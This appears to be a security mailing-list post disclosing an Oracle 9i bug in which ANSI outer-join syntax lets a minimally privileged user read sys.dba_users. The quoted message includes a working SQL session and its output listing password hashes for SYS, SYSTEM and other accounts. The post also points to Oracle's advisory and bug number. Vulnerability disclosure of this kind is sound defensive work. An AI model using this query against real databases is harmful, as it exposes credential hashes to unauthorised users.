Hi Oracle have now posted an advisory to their security alerts page on 17 april.
The URL is http://otn.oracle.com/deploy/security/pdf/sql_joins_alert.pdf cheers Pete Finnigan In article <[EMAIL PROTECTED]>, Pete Finnigan <[EMAIL PROTECTED]> writes >Hi all > >I thought this list may be interested in this issue, apologies if its >known here already. > >Oracle 9i includes the new ANSI outer join syntax. Oracle still supports >the old syntax but in the new syntax there is a serious security issue >that allows any user to view any data. > >here is an example: > >SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2 > >(c) Copyright 2001 Oracle Corporation. All rights reserved. > > >Connected to: >Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production >With the Partitioning option >JServer Release 9.0.1.1.1 - Production > >SQL> connect / as sysdba >Connected. >SQL> CREATE USER us1 IDENTIFIED BY us11; > >User created. > >SQL> Grant Create Session to us1; > >Grant succeeded. > >SQL> connect us1/us11; >Connected. >SQL> select a.username, a.password > 2 from sys.dba_users a left outer join sys.dba_users b on > 3 b.username = a.username > 4 ; > >USERNAME PASSWORD >------------------------------ ------------------------------ >SYS D4C5016086B2DC6A >SYSTEM D4DF7931AB130E37 >DBSNMP E066D214D5421CCC >AURORA$JIS$UTILITY$ INVALID_ENCRYPTED_PASSWORD >OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD >AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD >SCOTT F894844C34402B67 >US1 491AB9AB94D8A9EF >OUTLN 4A3BA55E08595C81 >ORDSYS 7EFA02EC7EA6B86F >OLAPSVR AF52CFD036E8F425 > >USERNAME PASSWORD >------------------------------ ------------------------------ >OLAPSYS 3FB8EF9DB538647C >ORDPLUGINS 88A2B2C183431F00 >MDSYS 72979A94BAD2AF80 >CTXSYS 71E687F036AD56E5 >WKSYS 69ED49EE1851900D >OLAPDBA 1AF71599EDACFB00 >QS_CBADM 7C632AFB71F8D305 >QS_ADM 991CDDAD5C5C32CA >QS 8B09C6075BDF2DC4 >QS_WS 24ACF617DD7D8F2F >HR 6399F3B38EDF3288 > >USERNAME PASSWORD >------------------------------ ------------------------------ >OE 9C30855E7E0CB02D >PM 72E382A52E89575A >SH 9793B3777CD3BD1A >QS_ES E6A6FA4BB042E3C2 >QS_OS FF09F3EB14AE5C26 >RMAN E7B5D92911C831E1 >QS_CB CF9CFACF5AE24964 >QS_CS 91A00922D8C0F146 > >30 rows selected. > >SQL> > >This shows that a user with the barest of privileges, i.e. CREATE >SESSION can actually see data in the data dictionary that should not be >seen. In this example we can select the list of usernames and their >hashes. > >I wanted to bring this issue to the security community as its doing the >rounds on the oracle server newsgroup. Oracle are already aware of this >as there is a bug to cover it number 2121935. Its marked as fixed in 9.2 >and will not be back ported to earlier versions of Oracle. I could not >find this on the oracle security alerts site or on the bug traq database >so here it is. > >Best regards > >Pete Finnigan >www.pentest-limited.com > -- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager at [EMAIL PROTECTED] -- Pete Finnigan IT Security Consultant PenTest Limited Office 01565 830 990 Fax 01565 830 889 Mobile 07974 087 885 [EMAIL PROTECTED] www.pentest-limited.com